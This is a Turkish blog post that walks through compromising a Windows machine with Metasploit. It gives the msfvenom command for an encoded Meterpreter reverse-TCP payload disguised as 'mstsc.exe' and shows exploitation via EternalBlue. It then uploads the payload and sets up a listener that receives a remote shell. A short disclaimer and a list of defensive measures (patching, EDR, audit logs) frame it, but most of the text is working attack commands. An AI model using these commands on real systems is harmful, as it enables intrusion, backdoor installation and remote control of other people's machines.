volkan demirci Security

Kali MSFVenom Reverse Shell

Bu makale, kullanmakta olduğunuz sistemleri (Server/Client) güncel tutmanız ve security hardening yapmanız için yayınlanmıştır. Sistemleriniz de güvenlik açığı olduğu zaman aşağıdaki işlemler yapılabilmektedir.

Bu bilgileri yasa dışı bir faaliyet amacıyla kullanmayınız.

MSFVenom, Kali Linux Metasploit içerisinde bulunan bu araç en çok backdoor oluşturmak amacıyla kullanılır. Bu tool’dan önce bu amaçla msfpayload ve msfencode kullanılmaktaydı.

Kullanımı,

Terminal ekranın da “msfvenom -h” yazılır.

Windows ortamında remote bağlantı yapmak amacıyla kullanılan mstsc aracı ile isim benzerliği olması amacıyla bir ZARARLI oluşturacağım.

Komut,

msfvenom -p windows/meterpreter/reverse_tcp lhost=1.1.1.3 lport=443 -f exe -a X86 -o /root/desktop/mstsc.exe –platform windows -e x86/shikata_ga_nai -i 20

Oluşturduğum dosyayı path’in de kontrol ediyorum.

Oluşturduğum “mstsc.exe” dosyasını hedef bilgisayara aşağıdaki gibi göndereceğim.

Metasploit terminali açıyorum ve aşağıdaki komutları kullanıyorum.

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

set rhost 1.1.1.4

set lhost 1.1.1.3

run

Meterpreter’a geçtikten sonra sysinfo komutunu kullanrak bağlantımı kontrol ediyorum.

upload ‘/root/desktop/mstsc.exe’ c:\\” komutunu kullananarak zararlı dosyamı (mstsc.exe) hedef gilgisayarın C:\ diskine kopyalıyorum.

Gerekli kontrollerimi yapıyorum.

Dinleme moduna geçme (Handler Mode )

Metasploit terminal’im de aşağıdaki komutu çalıştırıyorum.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 1.1.1.3

set lport 443

set ExitOnSession false

exploit -j -z

Bu şekilde dinleme moduna geçmiş oluyorum. Windows ortamında bulunan mstsc.exe zararlı dosyasına tıklandığında Kali ortamım da aşağıdaki gibi session açılacaktır.

Sessions komutu ile aktif session’ları kontrol edilyorum.

session -i 1 komutu ile 1 nolu session’ı başlatıyorum.

sysinfo komutu ile hedef bilgisayarı kontrol ediyorum.

Shell ve whoami komutu ile hedef makina ya erişmiş ve komut çalıştırmış oluyorum.

———————————————————————————————————————————————

N O T: Kesinlikle bilgisayarlarımızı güncel tutmalıyız, Windows güncellemelerini zamanın da ve tam olarak yapmalıyız . Ayrıca bilgisayarımız da bulunan tüm uygulamalarında güncellemelerini yapmalıyız.

———————————————————————————————————————————————

  • ATA yada Azure ATP kullanınız.
  • PAW (high secure workstation) kullanınız.
  • Anti virüs + EDR + Malware Detection kullanınız.
  • Aduit Log’ların doğru konfigüre edildiğinden ve aktif olduğundan emin olunuz.

———————————————————————————————————————————————